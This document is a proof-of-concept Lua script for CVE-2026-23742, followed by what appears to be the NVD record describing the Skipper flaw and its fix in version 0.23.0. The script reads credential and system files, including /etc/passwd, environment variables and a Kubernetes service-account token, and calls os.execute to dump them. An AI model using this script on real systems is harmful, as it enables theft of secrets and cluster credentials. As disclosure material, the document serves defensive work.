CVE-2026-23742

-- Lua script to read files accessible to skipper process -- CVE-2026-23742 PoC -- Function to read file contents local function read_file(path) local file = io.open(path, 'r') if file then local content = file:read('*all') file:close() return content end return nil end -- Read sensitive files local sensitive_paths = { '/etc/passwd', '/proc/self/environ', '/var/log/skipper/access.log', '/run/secrets/kubernetes.io/serviceaccount/token' } -- Execute and exfiltrate (simulated) for _, path in ipairs(sensitive_paths) do local content = read_file(path) if content then -- In real attack, this would be exfiltrated print('File found: ' .. path) end end -- Alternative: Use os.execute to read files os.execute('cat /etc/passwd') os.execute('env > /tmp/env.txt')

{"cve": {"id": "CVE-2026-23742", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:51.613", "lastModified": "2026-02-18T16:28:20.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Skipper is an HTTP router and reverse proxy for service composition. The default skipper configuration before 0.23.0 was -lua-sources=inline,file. The problem starts if untrusted users can create lua filters, because of -lua-sources=inline , for example through a Kubernetes Ingress resource. The configuration inline allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs, they an read skipper secrets. This vulnerability is fixed in 0.23.0."}, {"lang": "es", "value": "Skipper es un router HTTP y proxy inverso para composición de servicios. La configuración predeterminada de Skipper antes de la versión 0.23.0 era -lua-sources=inline,file. El problema comienza si usuarios no confiables pueden crear filtros Lua, debido a -lua-sources=inline, por ejemplo, a través de un recurso Ingress de Kubernetes. La configuración inline permite a estos usuarios crear un script que es capaz de leer el sistema de archivos accesible al proceso de Skipper y, si el usuario tiene acceso para leer los registros, puede leer los secretos de Skipper. Esta vulnerabilidad se corrige en la versión 0.23.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-250"}, {"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zalando:skipper:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.23.0", "matchCriteriaId": "B0D14C02-AFA2-4DFF-BFE2-65B34B7B0F81"}]}]}], "references": [{"url": "https://github.com/zalando/skipper/commit/0b52894570773b29e2f3c571b94b4211ef8fa714", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zalando/skipper/releases/tag/v0.23.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/zalando/skipper/security/advisories/GHSA-cc8m-98fm-rc9g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}